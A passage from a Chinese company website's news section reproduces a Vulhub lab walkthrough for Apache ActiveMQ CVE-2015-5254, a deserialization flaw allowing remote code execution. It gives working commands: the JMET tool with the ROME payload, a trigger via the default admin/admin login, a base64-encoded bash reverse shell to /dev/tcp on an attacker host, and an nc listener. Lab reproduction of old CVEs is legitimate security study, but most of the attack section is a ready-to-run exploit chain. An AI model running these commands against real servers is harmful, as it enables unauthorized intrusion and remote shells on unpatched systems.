尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

activemqCVE-2015-5254漏洞复现

activemqCVE-2015-5254漏洞复现
📅 发布时间:2026/6/18 21:59:32

activemq/CVE-2015-5254漏洞复现

原理

该漏洞源于序列化的Java Message Service(JMS)ObjectMessage对象存在反序列化漏洞,同时程序没有对代理中序列化的类做限制,导致攻击者可以构造恶意的序列化的类进行RCE攻击。

影响范围: Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞。

参考文章

http://halorealme.com/zh/Vulhub靶场/ActiveMQ 反序列化漏洞(CVE-2015-5254).html

复现

进入漏洞目录

docker-compose up -d

将目标启动起来以后,使用命令查看ip及靶场信息

ifconfig
docker ps
docker-compose ps -a

在浏览器中访问IP及端口进入网站

ip:8161

image

下载工具

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

将下载好的工具放在一个文件夹下面,并手动创建一个名为external的空文件夹(否则运行工具可能会报错);

构造命令,将you-ip改为你自己的攻击机ip

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-server-ip 61616

ROME为JMET中自带的反序列化漏洞攻击载荷,命令执行后会给activeMQ添加一个名字叫event的队列,管理员点击查看这个消息队列时攻击就会触发——在服务器的/tmp目录下创建一个success文件。
命令解析
-Q event 在ActiveMQ中创建一个名为event的队列
-I ActiveMQ 指定中间件
-s 静默模式减少输出
-Y "touch /tmp/success" 你想要执行的命令,创建一个名为success的文件
-Yp ROME 指定利用 ROME 反序列化链来构造恶意负载

执行完命令后输入
http://你的靶机IP:8161/admin/browse.jsp?JMSDestination=event
使用管理员登录(admin/admin),点击消息队列

d908f19631374234c10eb0314b31cbec

点击后创建出

进入容器

docker exec -it 编号 /bin/bash

执行命令后:

image

success文件已经被创建

创建反弹shell

将创建文件的命令更换为反弹shell的命令

但是无法直接反弹,需要将命令进行base64编码

bash -i &> /dev/tcp/your-攻击机-ip/your-port 0>&1 
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,You****base64==}|{base64,-d}|{bash,-i}" -Yp ROME your-server-ip 61616

反弹成功后在攻击机中使用nc监听刚刚输入的端口

nc -lvnp your-port

image

相关新闻

  • 模块联邦共享组件的时候如何进行版本管理
  • 查询排序与表连接
  • pyqt 自定义QTableWidget

最新新闻

  • PowerPC 601缓存时序与总线仲裁机制深度解析
  • 一念成仙:看山不是山,看水不是水,为什么OPC创业的核心是商业模式,而非代码本身
  • 国内主流打包机厂家实测排行 适配电商物流多场景 - 起跑123
  • 终端(Terminal)通俗完整讲解
  • 车载雷达架构迭代|全网量产复盘 场景反向定义ODD边界、L2-L4全域硬件升级、分布式转集中架构迭代、多雷达时序融合、整车感知全套工程复现
  • Windows系统优化神器:3分钟让你的电脑焕然一新

日新闻

  • 2026年不锈钢卷板厂家推荐排行榜:冷轧热轧/304/201不锈钢卷板,高颜值耐腐蚀源头厂家实力精选 - 企业推荐官【官方】
  • FLUX.1-dev FP8模型实战指南:24GB以下显卡高效部署方案
  • 2026佛山长途搬家价目表:跨省跨市搬家费用完整计算指南 - 从来都是英雄出少年

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号